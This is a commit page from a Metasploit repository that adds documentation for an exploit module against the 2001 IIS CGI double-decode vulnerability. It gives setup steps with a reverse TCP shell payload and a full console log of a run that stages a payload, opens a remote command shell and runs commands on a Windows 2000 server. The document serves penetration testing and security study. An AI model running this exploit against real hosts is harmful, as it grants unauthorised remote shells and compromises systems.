adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

ms01_026_dbldecode: Use HttpClient; remove meterpreter code; fix stager

Browse Source
This commit is contained in:
bcoles
2022-07-03 18:22:55 +10:00
parent 6b17905790
commit 04aa05faa2
2 changed files with 204 additions and 167 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/windows/iis/ms01_026_dbldecode.md
+71
View File
@@ -0,0 +1,71 @@
## Vulnerable Application
This module will execute an arbitrary payload on a Microsoft IIS installation
that is vulnerable to the CGI double-decode vulnerability of 2001.
This module has been tested successfully on:
* Windows 2000 Professional (SP0) (EN)
* Windows 2000 Professional (SP1) (AR)
* Windows 2000 Professional (SP1) (CZ)
* Windows 2000 Server (SP0) (FR)
* Windows 2000 Server (SP1) (EN)
* Windows 2000 Server (SP1) (SE)
Note: This module will leave a Metasploit payload in the IIS scripts directory.
## Verification Steps
1. `use exploit/windows/iis/ms01_026_dbldecode`
1. `set RHOSTS [IP]`
1. `set PAYLOAD windows/shell/reverse_tcp`
1. `set LHOST [IP]`
1. `run`
## Options
### WINDIR
The Windows directory name of the target host.
The directory name will be detected automatically if not set.
### DEPTH
Traversal depth to reach the drive root (default: `2`)
## Scenarios
### Windows 2000 Server (SP0) (FR)
```
msf6 > use exploit/windows/iis/ms01_026_dbldecode
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/iis/ms01_026_dbldecode) > set rhosts 192.168.200.175
rhosts => 192.168.200.175
msf6 exploit(windows/iis/ms01_026_dbldecode) > check
[+] 192.168.200.175:80 - The target is vulnerable. Found Windows directory name: winnt
msf6 exploit(windows/iis/ms01_026_dbldecode) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/iis/ms01_026_dbldecode) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using Windows directory "winnt"
[*] Copying "\winnt\system32\cmd.exe" to the IIS scripts directory as "EcFJ.exe"...
[*] Command Stager progress - 66.67% done (40/60 bytes)
[*] Command Stager progress - 100.00% done (60/60 bytes)
[*] Triggering payload "qQErEZeB.exe" via a direct request...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.175
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.175:1090) at 2022-06-28 08:34:32 -0400
[!] This exploit may require manual cleanup of 'qQErEZeB.exe' on the target
Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
c:\inetpub\scripts>hostname
hostname
win2k-srv-fr
```